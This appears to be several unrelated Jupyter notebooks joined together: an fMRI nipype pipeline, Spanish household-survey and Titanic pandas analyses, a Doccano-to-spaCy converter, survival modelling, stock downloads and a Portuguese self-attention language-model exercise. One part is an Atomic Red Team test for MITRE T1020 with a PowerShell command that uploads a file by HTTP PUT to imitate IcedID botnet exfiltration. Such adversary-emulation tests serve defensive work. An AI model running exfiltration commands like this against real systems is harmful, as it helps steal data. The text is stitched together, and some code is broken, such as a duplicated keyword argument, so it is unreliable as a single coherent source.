of the template needs work to provide a cleaner way to specify contrasts* Could use the same vector contrasts approach as we have in batch8 and then have a function to convert this into the list of list data structure that nipype spm contrasts node looks fordef make_contrast_list(subject_id, condition_names, model_path, DEBUG=False): import json condition_names.append('constant') cont = [] for idx, cname in enumerate(condition_names): ccode = [0 if pos!=idx else 1 for pos in range(len(condition_names))] cont.append([cname, 'T', condition_names, ccode]) # add custom contrasts from the JSON model file with open(model_path) as fh: model_def = json.load(fh) contrasts = model_def.get('Contrasts') if not contrasts: return cont for contrast in contrasts: cname = contrast['name'] pos_idx = [condition_names.index(p) for p in contrast['pos']] neg_idx = [condition_names.index(n) for n in contrast['neg']] pos_length = len(contrast['pos']) neg_length = len(contrast['neg']) ccode = [] for idx, _ in enumerate(condition_names): if idx in pos_idx: ccode.append(1/pos_length) elif idx in neg_idx: ccode.append(-1/neg_length) else: ccode.append(0) cont.append([cname, 'T', condition_names, ccode]) if DEBUG: print(contrast) print(ccode) return contSet up processing nodes for modeling workflow Specify model node# SpecifyModel - Generates SPM-specific Model modelspec = pe.Node(model.SpecifySPMModel(concatenate_runs=False, input_units='secs', output_units='secs', time_repetition=TR, high_pass_filter_cutoff=128), output_units = 'scans', name="modelspec")Level 1 Design node** TODO -- get the right matching template file for fmriprep *** ??do we need a different mask than: `'/data00/tools/spm8/apriori/brainmask_th25.nii'`# Level1Design - Generates an SPM design matrix level1design = pe.Node(spm.Level1Design(bases={'hrf': {'derivs': [0, 0]}}, timing_units='secs', interscan_interval=TR, model_serial_correlations='none', #'AR(1)', mask_image = '/data00/tools/spm8/apriori/brainmask_th25.nii', global_intensity_normalization='none' ), name="level1design")Estimate Model node# EstimateModel - estimate the parameters of the model level1estimate = pe.Node(spm.EstimateModel(estimation_method={'Classical': 1}), name="level1estimate")Estimate Contrasts node# EstimateContrast - estimates contrasts conestimate = pe.Node(spm.EstimateContrast(), name="conestimate")Setup pipeline workflow for level 1 model# Initiation of the 1st-level analysis workflow l1analysis = pe.Workflow(name='l1analysis') # Connect up the 1st-level analysis components l1analysis.connect([(modelspec, level1design, [('session_info', 'session_info')]), (level1design, level1estimate, [('spm_mat_file', 'spm_mat_file')]), (level1estimate, conestimate, [('spm_mat_file', 'spm_mat_file'), ('beta_images', 'beta_images'), ('residual_image', 'residual_image')]) ])Set up nodes for file handling and subject selection `getsubjectinfo` node * Use `get_subject_info()` function to generate spec data structure for first level model design matrix# Get Subject Info - get subject specific condition information getsubjectinfo = pe.Node(util.Function(input_names=['subject_id', 'model_path'], output_names=['subject_info', 'realign_params', 'condition_names'], function=get_subject_info), name='getsubjectinfo') makecontrasts = pe.Node(util.Function(input_names=['subject_id', 'condition_names', 'model_path'], output_names=['contrasts'], function=make_contrast_list), name='makecontrasts')`infosource` node* iterate over list of subject ids and generate subject ids and produce list of contrasts for subsequent nodes# Infosource - a function free node to iterate over the list of subject names infosource = pe.Node(util.IdentityInterface(fields=['subject_id', 'model_path', 'resolution', 'smoothing'] ), name="infosource") try: fwhm_list = smoothing_list except: fwhm_list = [4,6,8] try: resolution_list = resolutions except: resolution_list = ['low','medium','high'] infosource.iterables = [('subject_id', subject_list), ('model_path', [JSON_MODEL_FILE]*len(subject_list)), ('resolution', resolution_list), ('smoothing', ['fwhm_{}'.format(s) for s in fwhm_list]) ]`selectfiles` node* match template to find source files (functional) for use in subsequent parts of pipeline# SelectFiles - to grab the data (alternativ to DataGrabber) ## TODO: here need to figure out how to incorporate the run number and task name in call templates = {'func': '{subject_id}/{resolution}/{smoothing}/sr{subject_id}_task-'+TASK_NAME+'_run-0*_space-MNI152-T1-1mm_desc-preproc_bold.nii'} selectfiles = pe.Node(nio.SelectFiles(templates, base_directory='/data00/projects/megameta/{}/derivatives/nipype/resampled_and_smoothed'.format(PROJECT_NAME)), working_dir=working_dir, name="selectfiles")Specify datasink node* copy files to keep from various working folders to output folder for model for subject# Datasink - creates output folder for important outputs datasink = pe.Node(nio.DataSink(base_directory=SUBJ_DIR, parameterization=True, #container=output_dir ), name="datasink") datasink.inputs.base_directory = output_dir # Use the following DataSink output substitutions substitutions = [] subjFolders = [('_model_path.*resolution_(low|medium|high)_smoothing_(fwhm_\\d{1,2})_subject_id_sub-.*/(.*)$', '\\1/\\2/\\3')] substitutions.extend(subjFolders) datasink.inputs.regexp_substitutions = substitutions--------- Set up workflow for whole processpipeline = pe.Workflow(name='first_level_model_{}_{}'.format(TASK_NAME.upper(),MODEL_NAME)) pipeline.base_dir = os.path.join(SUBJ_DIR, working_dir) pipeline.connect([(infosource, selectfiles, [('subject_id', 'subject_id'), ('resolution', 'resolution'), ('smoothing', 'smoothing') ]), (infosource, getsubjectinfo, [('subject_id', 'subject_id'), ('model_path', 'model_path') ]), (infosource, makecontrasts, [('subject_id', 'subject_id'), ('model_path', 'model_path') ]), (getsubjectinfo, makecontrasts, [('condition_names', 'condition_names')]), (getsubjectinfo, l1analysis, [('subject_info', 'modelspec.subject_info'), ('realign_params', 'modelspec.realignment_parameters')]), (makecontrasts, l1analysis, [('contrasts', 'conestimate.contrasts')]), (selectfiles, l1analysis, [('func', 'modelspec.functional_runs')]), (infosource, datasink, [('subject_id','container')]), (l1analysis, datasink, [('conestimate.spm_mat_file','@spm'), ('level1estimate.beta_images','@betas'), ('level1estimate.mask_image','@mask'), ('conestimate.spmT_images','@spmT'), ('conestimate.con_images','@con'), ('conestimate.spmF_images','@spmF') ]) ] )Análisis Concentrado Hogar.Haciendo un análisis muy rapido sobre nuestro dataframe concentrado hogar , podemos concluir que las familias de nuestra muestra de datos tienen las siguientes características :* las familias de nuestro conjunto de datos estan conformadas por **3** integrantes en promedio.* La educación promedio de jefes del hogar **solamente es hasta la secundaria** , seguido de los que tienen la primaria concluida y solo un **1.76% de nuestra muestra estudio algún posgrado.*** la edad de los jefes del hogar promedio es de **49** años & redondeandolo a 3 cifras significativas es de **50** años.* El hogar principal promedio constituido en nuestra muestra es **nuclear** , esto significa que esta constituido por un solo grupo familiar primario.* El numero de personas promedio por hogar que perciben ingreso corriente monetario y tienen trabajo es de **2** , mientras el numero promedio de personas que tienen trabajo y 14 años o mas es de **2**.* Podemos notar que los jefes de familia en su mayoria son hombres.---CODIGO:import pandas as pd import seaborn as sns import matplotlib.pyplot as plt data = pd.read_csv('/content/conjunto_de_datos_concentradohogar_enigh_2018_ns.csv') data.sample(n=12)---**OBJETIVO:**Con el fin de continuar con nuestro analisis de los datos [Concentradohogar](https://www.inegi.org.mx/temas/ingresoshog/) queremos definir algunas caracteristicas de el hogar del mexicano , basandonos en el conjunto de datos. Caracteristicas que nos interesan saber (por ahora). * **¿Cuál es la educación del jefe del hogar?** * **¿ Cuál es el número promedio de personas que habitan en nuestra muestra?** * **¿ Cuál es la edad promedio del jefe del hogar ?** * **¿Cuál es el promedio de la clase hogar?** * **¿Hay mas hombres o mujeres?** * **¿Cuál es el promedio de personas trabajando por hogar?** * **¿Cuantas horas extra en promedio trabaja el mexicano en nuestra muestra?**------ ¿ Cómo es el hogar promedio en México ? Estudios realizados por el feje del hogar en México.Recordemos que las variables son las siguiente:* 1 - Sin estudios.* 2 - Preescolar.* 3 - Primaria incompleta.* 4 - primaria completa.* 5 - Secundaria incompleta.* 6 - Secundaria completa.* 7 - Preparatoria incompleta.* 8 - Preparatoria completa.* 9 - Universidad incompleta.* 10 - Universidad completa.* 11 - PosgradoProcedemos a gráficar los datos de esta variable:_ = sns.countplot(data['educa_jefe'])/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarningPodemos notar que la mayoria de jefes del hogar solamente estudiaron hasta la secundaria , seguido de los que tienen la primaria concluida y solo un **1.76%** de nuestra muestra estudio algún posgrado. ¿Cuál es el número promedio de personas que habitan en los hogares mexicanos?Para responder a esta pregunta , tomaremos la variable `tot_integ` que contiene el número de personas pertenecientes a este hogar, sin considerar los trabajadores domesticos y a los familiares de estos ni a los huespedes.sns.set() _ = sns.countplot(data['tot_integ'],color='#2ecc71') _ = plt.xlabel('Total de integrantes en vivienda') plt.show()/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarningConsultamos la mediana:data['tot_integ'].median()Por lo tanto ya tenemos otra caracteristica común entre nuestra muestra y es que las familias de nuestro conjunto de datos estan conformadas por 3 integrantes en promedio. ¿Cuál es la edad promedio del jefe del hogar?Nos interesa saber que edad tiene en promedio el jefe del hogar , para esto haremos una representación gráfica y calcularemos su media._ = sns.distplot(data['edad_jefe'],color='#3ddc93') plt.show() mean = data['edad_jefe'].mean() print('La media muestral es: {}'.format(mean))La media muestral es: 49.79609361394296Podemos notar que la edad de los jefes del hogar promedio es de 49 años & redondeandolo a 3 cifras significativas es de 50 años.Por lo que ya tenemos otro dato y es que la edad promedio del jefe del hogar es de 50 años. ¿Cuál es el promedio de la clase hogar?El objetivo de responder esta rpegunta es , identificar la diferencia de los hogares apartir del tipo de relacion sosanguínea , legal , de afinidad o de costumbre.Se clasifican en:* **Unipersonal** : Hogar formado por una sola persona que es el jefe.* **Nuclear** : hogar constituido por un solo grupo familiar primario.* **Ampliado**: Hogar formado por el jefe y su grupo familiar primario más otros grupos familiares u o parientes.* **Compuesto**: Hogar formado por un hogar nuclear o ampliado con personas sin parentesco con el jefe.* **Corresidiente:** Hogar formado por dos o más personas que no tienen parentezco con el jefe.sns.set() _ = sns.countplot(data['clase_hog'],palette='cool') _ = plt.xlabel('Clase hogar') _ = plt.ylabel('count') _ = plt.title('diagrama de frecuencia de la clase hogar.') plt.show()/usr/local/lib/python3.6/dist-packages/seaborn/_decorators.py:43: FutureWarning: Pass the following variable as a keyword arg: x. From version 0.12, the only valid positional argument will be `data`, and passing other arguments without an explicit keyword will result in an error or misinterpretation. FutureWarningNotemos que lavariable 2 es la ganadora y ¿que nos dice esto?.. Bueno nos dice que el hogar principal constituido en nuestra muestra es nucllear , esto significa que esta constituido por un solo grupo familiar primario. ¿Cuál es el promedio de personas trabajando por hogar?Para espooonder esta pregunta tomaremos la variable `ocupados` y la variable `perc_ocupa`.percep = round(data['perc_ocupa'].mean()) ocupados = round(data['ocupados'].mean()) print(percep) print(ocupados)2 2Podemos notar que el numero de personas que perciben ingreso corriente monetario y tienen trabajo es de 2 , mientras el numero promedio de personas que tienen trabajo y 14 años o mas es de 2. Hay mas hombres o mujeres_ = sns.countplot(data['sexo_jefe'])Resumen de los datos: dimensiones y estructurasimport pandas as pd import os mainpath = "C:/Users/francisco/Documents/GitHub/python-ml-course/datasets" filename = "titanic/titanic3.csv" fullpath = os.path.join(mainpath, filename) #Tambien puede concatenerse sting: mainpath + "/" + filename data = pd.read_csv(fullpath) data.head(10) data.tail(10) data.shape data.columns.valuesResumen de los estadísticos básicos de las variables numéricasdata.describe() data.dtypesMissing Valuespd.isnull(data["body"]) pd.notnull(data["body"]) pd.isnull(data["body"]).values.ravel().sum() pd.notnull(data["body"]).values.ravel().sum()Los valores que faltan en un dataset pueden venir por dos motivos:* Extracción de los datos* Recolección de los datos Borrado de valores que faltandata.dropna(axis=0, how="all") #axis 0 borraria fila y 1 columnas, el how es lo que tiene que tener en cuenta data2 = data data2.dropna(axis=0, how="any")Cómputo de los valores faltantesdata3 = data data3.fillna(0) data4 = data data4 = data4.fillna("Desconocido") data5 = data data5["body"] = data5["body"].fillna(0) data5["home.dest"] = data5["home.dest"].fillna("Desconocido") data5.head() data5["age"].fillna(data5["age"].mean()) data5 data5["age"].fillna(method="ffill") #rellena con el valor anterior que no sea null bfill con el primero no null que haya hacia abajoVariables Dummydata["sex"] dummy_sex = pd.get_dummies(data["sex"], prefix="sex") dummy_sex column_names = data.columns.values.tolist() column_names data.drop(["sex"], axis=1) pd.concat([data, dummy_sex], axis = 1) def createDummies(df, var_name): dummies = pd.get_dummies(df[var_name], prefix=var_name) df = df.drop(var_name, axis=1) df = pd.concat([df, dummies], axis=1) return df createDummies(data3, "sex")Doccano JSONL to spaCy v2.0 JSON formatData exported out from Doccano is usually in a JSONL format and references the entities in text differently from the spaCy v2.0 method. So far I haven't found any method to directly converted Doccano-formatted data to a format ready for use for spaCy v3.0, so converting to v2.0 as an intermediate step will have to do for now.Import JSON and Randomimport json import randomUse json.loads() to handle the JSONL file. Then, for each line, reorganise data and labels into the spaCy *[text, {"entities":label}]* format.results = [] with open("../../data/doccano_annotated_data/edited_annotations.jsonl") as annotations_in_jsonl: for line in annotations_in_jsonl: j_line=json.loads(line) # Reorganise data to spaCy's [text, {"entities":label}] format line_results = [j_line['data'], {"entities":j_line['label']}] results.append(line_results)Shuffle the datasets, then split to training and validation data in an 80:20 ratiorandom.shuffle(results) train_data_end_index = int(len(results) - (len(results) / 5)) validation_data_start_index = int(len(results) - (len(results) / 5) + 1) final_index = int(len(results) - 1) training_set = results[0:train_data_end_index] validation_set = results[validation_data_start_index:final_index] print(len(training_set), len(validation_set))1280 318Save to JSON file for further conversion to spaCy v3.0 formatsave_data_path = "../../data/training_datasets/" def save_data(file, data): with open (save_data_path + file, "w", encoding="utf-8") as f: json.dump(data, f, indent=4) save_data("full_train_data_doccano.json", results) save_data("training_set_doccano.json", training_set) save_data("validation_set_doccano.json", validation_set)DSM on SUPPORT Dataset The SUPPORT dataset comes from the Vanderbilt University studyto estimate survival for seriously ill hospitalized adults.(Refer to http://biostat.mc.vanderbilt.edu/wiki/Main/SupportDesc.for the original datasource.)In this notebook, we will apply Deep Survival Machines for survival prediction on the SUPPORT data. Load the SUPPORT DatasetThe package includes helper functions to load the dataset.X represents an np.array of features (covariates),T is the event/censoring times and,E is the censoring indicator.import sys import os path = "/home/ubuntu/" sys.path.append(os.path.join(path, "DeepSurvivalMachines")) from dsm import datasets x, t, e = datasets.load_dataset('SUPPORT')Compute horizons at which we evaluate the performance of DSMSurvival predictions are issued at certain time horizons. Here we will evaluate the performanceof DSM to issue predictions at the 25th, 50th and 75th event time quantile as is standard practice in Survival Analysis.import numpy as np horizons = [0.25, 0.5, 0.75] times = np.quantile(t[e==1], horizons).tolist()Splitting the data into train, test and validation setsWe will train DSM on 70% of the Data, use a Validation set of 10% for Model Selection and report performance on the remaining 20% held out test set.n = len(x) tr_size = int(n*0.70) vl_size = int(n*0.10) te_size = int(n*0.20) x_train, x_test, x_val = x[:tr_size], x[-te_size:], x[tr_size:tr_size+vl_size] t_train, t_test, t_val = t[:tr_size], t[-te_size:], t[tr_size:tr_size+vl_size] e_train, e_test, e_val = e[:tr_size], e[-te_size:], e[tr_size:tr_size+vl_size]Setting the parameter gridLets set up the parameter grid to tune hyper-parameters. We will tune the number of underlying survival distributions, ($K$), the distribution choices (Log-Normal or Weibull), the learning rate for the Adam optimizer between $1\times10^{-3}$ and $1\times10^{-4}$ and the number of hidden layers between $0, 1$ and $2$.from sklearn.model_selection import ParameterGrid param_grid = {'k' : [3, 4, 6], 'distribution' : ['LogNormal', 'Weibull'], 'learning_rate' : [ 1e-4, 1e-3], 'layers' : [ [], [100], [100, 100] ] } params = ParameterGrid(param_grid)Model Training and Selectionfrom dsm import DeepSurvivalMachines models = [] for param in params: model = DeepSurvivalMachines(k = param['k'], distribution = param['distribution'], layers = param['layers']) # The fit method is called to train the model model.fit(x_train, t_train, e_train, iters = 100, learning_rate = param['learning_rate']) models.append([[model.compute_nll(x_val, t_val, e_val), model]]) best_model = min(models) model = best_model[0][1]12%|█████████▌ | 1242/10000 [00:02<00:19, 449.58it/s] 100%|█████████████████████████████████████████████████████████████████████████████████| 100/100 [00:12<00:00, 7.96it/s] 12%|█████████▌ | 1242/10000 [00:01<00:13, 628.37it/s] 37%|██████████████████████████████▎ | 37/100 [00:05<00:08, 7.11it/s] 12%|█████████▌ | 1242/10000 [00:02<00:14, 619.24it/s] 81%|██████████████████████████████████████████████████████████████████▍ | 81/100 [00:11<00:02, 7.08it/s] 12%|█████████▌ | 1242/10000 [00:01<00:13, 635.02it/s] 17%|█████████████▉ | 17/100 [00:02<00:13, 6.19it/s] 12%|█████████▌ [...]Inferenceout_risk = model.predict_risk(x_test, times) out_survival = model.predict_survival(x_test, times)EvaluationWe evaluate the performance of DSM in its discriminative ability (Time Dependent Concordance Index and Cumulative Dynamic AUC) as well as Brier Score.from sksurv.metrics import concordance_index_ipcw, brier_score, cumulative_dynamic_auc cis = [] brs = [] et_train = np.array([(e_train[i], t_train[i]) for i in range(len(e_train))], dtype = [('e', bool), ('t', float)]) et_test = np.array([(e_test[i], t_test[i]) for i in range(len(e_test))], dtype = [('e', bool), ('t', float)]) et_val = np.array([(e_val[i], t_val[i]) for i in range(len(e_val))], dtype = [('e', bool), ('t', float)]) for i, _ in enumerate(times): cis.append(concordance_index_ipcw(et_train, et_test, out_risk[:, i], times[i])[0]) brs.append(brier_score(et_train, et_test, out_survival, times)[1]) roc_auc = [] for i, _ in enumerate(times): roc_auc.append(cumulative_dynamic_auc(et_train, et_test, out_risk[:, i], times[i])[0]) for horizon in enumerate(horizons): print(f"For {horizon[1]} quantile,") print("TD Concordance Index:", cis[horizon[0]]) print("Brier Score:", brs[0][horizon[0]]) print("ROC AUC ", roc_auc[horizon[0]][0], "\n")For 0.25 quantile, TD Concordance Index: 0.7599725448387127 Brier Score: 0.11117671231416189 ROC AUC 0.7702921720225825 For 0.5 quantile, TD Concordance Index: 0.7042284595815174 Brier Score: 0.18256319957426942 ROC AUC 0.7249247111486091 For 0.75 quantile, TD Concordance Index: 0.6595517112307617 Brier Score: 0.2214871248399886 ROC AUC 0.7139686193735991T1020 - Automated ExfiltrationAdversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). Atomic Tests#Import the Module before running the tests. # Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts. Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - ForceAtomic Test 1 - IcedID Botnet HTTP PUTCreates a text fileTries to upload to a server via HTTP PUT method with ContentType HeaderDeletes a created file**Supported Platforms:** windows Attack Commands: Run with `powershell````powershell$fileName = "C:\temp\T1020_exfilFile.txt"$url = "https://google.com"$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"$contentType = "application/octet-stream"try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}```Invoke-AtomicTest T1020 -TestNumbers 1Save Stock Data to csv file Simple save one ticker to csvimport numpy as np import matplotlib.pyplot as plt import pandas as pd import warnings warnings.filterwarnings("ignore") # fix_yahoo_finance is used to fetch data import fix_yahoo_finance as yf yf.pdr_override() # input symbol = 'AMD' start = '2014-01-01' end = '2019-01-01' # Read data dataset = yf.download(symbol,start,end) # View Columns dataset.head() # Output data into CSV # To save in your certain folder, change the Users name dataset.to_csv("C:/Users/Finance/Desktop/AMD.csv")Save Multi Stocks of "Adj Close" to csvsymbols = ['MMM','AXP','AAPL','BA','CAT','CVX','CSCO','KO','DIS','XOM','GE','GS','HD','IBM','INTC','JNJ','MCD','MRK','NKE','PFE','PG','UTX','UNH','VZ','V','WMT'] start = '2001-01-11' end = '2018-09-17' stocks_info = yf.download(symbols, start, end)['Adj Close'] stocks_data = stocks_info.iloc[::] stocks_data.head() # Output data into CSV stocks_data.to_csv("C:/Users/Finance/Desktop/stocks_data.csv")To find the path or current diectoryimport os cwd = os.getcwd() cwd from pathlib import Path print(Path.cwd())C:\WINDOWSnome = '' print(f'Meu nome é {nome}')Meu nome é Exercício: Modelo de Linguagem com auto-atenção Este exercício é similar ao da Aula 7, mas iremos agora treinar uma rede neural *com auto-atenção* para prever a próxima palavra de um texto, data as palavras anteriores como entrada. Na camada de auto-atenção, não se esqueça de implementar:- Embeddings de posição- Projeções lineares (WQ, WK, WV, WO)- Conexões residuais- Camada de feed forward (2-layer MLP)O dataset usado neste exercício (BrWaC) possui um tamanho razoável e você vai precisar rodar seus experimentos com GPU.Alguns conselhos úteis:- **ATENÇÃO:** o dataset é bem grande. Não dê comando de imprimí-lo.- Durante a depuração, faça seu dataset ficar bem pequeno, para que a depuração seja mais rápida e não precise de GPU. Somente ligue a GPU quando o seu laço de treinamento já está funcionando- Não deixe para fazer esse exercício na véspera. Ele é trabalhoso.# iremos utilizar a biblioteca dos transformers para ter acesso ao tokenizador do BERT. !pip install transformersLooking in indexes: https://pypi.org/simple, https://us-python.pkg.dev/colab-wheels/public/simple/ Collecting transformers Downloading transformers-4.19.2-py3-none-any.whl (4.2 MB)  |████████████████████████████████| 4.2 MB 4.8 MB/s [?25hCollecting pyyaml>=5.1 Downloading PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl (596 kB)  |████████████████████████████████| 596 kB 29.1 MB/s [?25hRequirement already satisfied: regex!=2019.12.17 in /usr/local/lib/python3.7/dist-packages (from transformers) (2019.12.20) Requirement already satisfied: tqdm>=4.27 in /usr/local/lib/python3.7/dist-packages (from transformers) (4.64.0) Requirement already satisfied: requests in /usr/local/lib/python3.7/dist-packages (from transformers) (2.23.0) Collecting tokenizers!=0.11.3,<0.13,>=0.11.1 Downloading tokenizers-0.12.1-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl (6.6 MB)  |█████████████████████████████[...]Importação dos pacotesimport collections import itertools import functools import math import random import torch import torch.nn as nn import numpy as np from torch.utils.data import DataLoader from tqdm import tqdm_notebook # Check which GPU we are using !nvidia-smi if torch.cuda.is_available(): dev = "cuda:0" else: dev = "cpu" device = torch.device(dev) print('Using {}'.format(device))Using cuda:0Implementação do MyDatasetfrom typing import List def tokenize(text: str, tokenizer): return tokenizer(text, return_tensors=None, add_special_tokens=False).input_ids class MyDataset(): def __init__(self, texts: List[str], tokenizer, context_size: int): self.tokensIds_n = [] self.y = [] for text in tqdm_notebook(texts): tokens_ids = tokenize(text, tokenizer) if len(tokens_ids) < context_size + 1: continue for i in range(len(tokens_ids)-context_size): self.tokensIds_n.append(tokens_ids[i:i+context_size]) self.y.append(tokens_ids[i+context_size]) def __len__(self): return len(self.tokensIds_n) def __getitem__(self, idx): return torch.tensor(self.tokensIds_n[idx]).long(), torch.tensor(self.y[idx]).long()Testando se a implementação do MyDataset está corretafrom transformers import BertTokenizer tokenizer = BertTokenizer.from_pretrained("neuralmind/bert-base-portuguese-cased") dummy_texts = ['Eu gosto de correr', 'Ela gosta muito de comer pizza'] dummy_dataset = MyDataset(texts=dummy_texts, tokenizer=tokenizer, context_size=3) dummy_loader = DataLoader(dummy_dataset, batch_size=6, shuffle=False) assert len(dummy_dataset) == 5 print('passou no assert de tamanho do dataset') first_batch_input, first_batch_target = next(iter(dummy_loader)) correct_first_batch_input = torch.LongTensor( [[ 3396, 10303, 125], [ 1660, 5971, 785], [ 5971, 785, 125], [ 785, 125, 1847], [ 125, 1847, 13779]]) correct_first_batch_target = torch.LongTensor([13239, 125, 1847, 13779, 15616]) assert torch.equal(first_batch_input, correct_first_batch_input) print('Passou no assert de input') assert torch.equal(first_batch_target, correct_first_batch_target) print('Passou no assert de target')Carregamento do dataset Iremos usar uma pequena amostra do dataset [BrWaC](https://www.inf.ufrgs.br/pln/wiki/index.php?title=BrWaC) para treinar e avaliar nosso modelo de linguagem.!wget -nc https://storage.googleapis.com/unicamp-dl/ia025a_2022s1/aula7/sample_brwac.txt # Load datasets context_size = 9 valid_examples = 100 test_examples = 100 texts = open('sample_brwac.txt').readlines() # print('Truncating for debugging purposes.') # texts = texts[:500] training_texts = texts[:-(valid_examples + test_examples)] valid_texts = texts[-(valid_examples + test_examples):-test_examples] test_texts = texts[-test_examples:] training_dataset = MyDataset(texts=training_texts, tokenizer=tokenizer, context_size=context_size) valid_dataset = MyDataset(texts=valid_texts, tokenizer=tokenizer, context_size=context_size) test_dataset = MyDataset(texts=test_texts, tokenizer=tokenizer, context_size=context_size) print(f'training examples: {len(training_dataset)}') print(f'valid examples: {len(valid_dataset)}') print(f'test examples: {len(test_dataset)}') class LanguageModel(torch.nn.Module): def __init__(self, vocab_size, context_size, embedding_dim): """ Implements the Self-attention, decoder-only." Args: vocab_size (int): Size of the input vocabulary. context_size (int): Size of the sequence to consider as context for prediction. embedding_dim (int): Dimension of the embedding layer for each word in the context. """ # Escreva seu código aqui. super().__init__() self.vocab_size = vocab_size self.context_size = context_size self.embedding_dim = embedding_dim # C() self.C_w = nn.Embedding(vocab_size, embedding_dim) # P() self.P_w = nn.Embedding(context_size, embedding_dim) self.K_w = nn.Linear(embedding_dim, embedding_dim , bias=False) self.Q_w = nn.Linear(embedding_dim, embedding_dim , bias=False) self.V_w = nn.Linear(embedding_dim, embedding_dim , bias=False) self.E_w = nn.Linear(embedding_dim, embedding_dim , bias=False) hidden_size = 2*embedding_dim self.linear1 = nn.Linear(embedding_dim, hidden_size) self.relu1 = nn.ReLU() # self.linear2 = nn.Linear(hidden_size, hidden_size) # self.downsample = nn.Conv1d(1, 1, kernel_size=1, stride=1, padding=0, groups=1, bias=False, dilation=1) # self.relu2 = nn.ReLU() self.linear3 = nn.Linear(hidden_size, vocab_size, bias=False) self.softmax = nn.Softmax(dim=-1) def forward(self, inputs): """ Args: inputs is a LongTensor of shape (batch_size, context_size) Returns: logits of shape (batch_size, vocab_size) """ # Escreva seu código aqui. C_emb = self.C_w(inputs) P_emb = self.P_w(torch.LongTensor(range(0,self.context_size)).to(inputs.device)).unsqueeze(0) X = C_emb + P_emb X_end = X[:,-1,:].unsqueeze(1) Q = self.Q_w(X_end) K = self.K_w(X) V = self.V_w(X) scores = torch.matmul(Q, torch.transpose(K,1,2))/math.sqrt(self.embedding_dim) probs = self.softmax(scores) E = torch.matmul(probs, V) E = self.E_w(E) E = E + X_end # identity = self.downsample(E) out = E.squeeze(1) # identity = identity.squeeze(1) out = self.linear1(out) out = self.relu1(out) # out = self.linear2(out) # out = out + identity # out = self.relu2(out) out = self.linear3(out) return outTeste o modelo com um exemplomodel = LanguageModel( vocab_size=tokenizer.vocab_size, context_size=context_size, embedding_dim=64, ).to(device) sample_train, _ = next(iter(DataLoader(training_dataset))) sample_train_gpu = sample_train.to(device) model(sample_train_gpu).shape num_params = sum(p.numel() for p in model.parameters() if p.requires_grad) print(f'Number of model parameters: {num_params}')Number of model parameters: 3834752Assert da Perplexidaderandom.seed(123) np.random.seed(123) torch.manual_seed(123) def perplexity(logits, target): """ Computes the perplexity. Args: logits: a FloatTensor of shape (batch_size, vocab_size) target: a LongTensor of shape (batch_size,) Returns: A float corresponding to the perplexity """ loss = nn.functional.cross_entropy(logits, target, reduction='mean') return torch.exp(loss) n_examples = 1000 sample_train, target_token_ids = next(iter(DataLoader(training_dataset, batch_size=n_examples))) sample_train_gpu = sample_train.to(device) target_token_ids = target_token_ids.to(device) logits = model(sample_train_gpu) my_perplexity = perplexity(logits=logits, target=target_token_ids) print(f'my perplexity: {int(my_perplexity)}') print(f'correct initial perplexity: {tokenizer.vocab_size}') assert math.isclose(my_perplexity, tokenizer.vocab_size, abs_tol=7000) print('Passou o no assert da perplexidade')my perplexity: 30074 correct initial perplexity: 29794 Passou o no assert da perplexidadeLaço de Treinamento e Validaçãomax_examples = 100_000_000 eval_every_steps = 10000 lr = 3e-4 model = LanguageModel( vocab_size=tokenizer.vocab_size, context_size=context_size, embedding_dim=128, ).to(device) train_loader = DataLoader(training_dataset, batch_size=512, shuffle=True, drop_last=True) validation_loader = DataLoader(valid_dataset, batch_size=512) optimizer = torch.optim.Adam(model.parameters(), lr=lr) def train_step(input, target): model.train() model.zero_grad() logits = model(input.to(device)) loss = nn.functional.cross_entropy(logits, target.to(device)) loss.backward() optimizer.step() return loss.item() def validation_step(input, target): model.eval() logits = model(input) loss = nn.functional.cross_entropy(logits, target) return loss.item() train_losses = [] n_examples = 0 step = 0 while n_examples < max_examples: for input, target in train_loader: loss = train_step(input.to(device), target.to(device)) train_losses.append(loss) if step % eval_every_steps == 0: train_ppl = np.exp(np.average(train_losses)) with torch.no_grad(): valid_ppl = np.exp(np.average([ validation_step(input.to(device), target.to(device)) for input, target in validation_loader])) print(f'{step} steps; {n_examples} examples so far; train ppl: {train_ppl:.2f}, valid ppl: {valid_ppl:.2f}') train_losses = [] n_examples += len(input) # Increment of batch size step += 1 if n_examples >= max_examples: break0 steps; 0 examples so far; train ppl: 29067.98, valid ppl: 28321.16 10000 steps; 5120000 examples so far; train ppl: 629.79, valid ppl: 379.95 20000 steps; 10240000 examples so far; train ppl: 317.63, valid ppl: 280.73 30000 steps; 15360000 examples so far; train ppl: 259.40, valid ppl: 245.46 40000 steps; 20480000 examples so far; train ppl: 236.11, valid ppl: 227.57 50000 steps; 25600000 examples so far; train ppl: 221.79, valid ppl: 217.68 60000 steps; 30720000 examples so far; train ppl: 205.78, valid ppl: 211.25 70000 steps; 35840000 examples so far; train ppl: 198.29, valid ppl: 207.45 80000 steps; 40960000 examples so far; train ppl: 196.59, valid ppl: 203.15 90000 steps; 46080000 examples so far; train ppl: 194.90, valid ppl: 200.05 100000 steps; 51200000 examples so far; train ppl: 192.93, valid ppl: 197.45 110000 steps; 56320000 examples so far; train ppl: 188.81, valid ppl: 196.00 120000 steps; 61440000 examples so far; train ppl: 178.76, valid ppl: 194.74 130000 steps; 665[...]Avaliação final no dataset de testeBonus: o modelo com menor perplexidade no dataset de testes ganhará 0.5 ponto 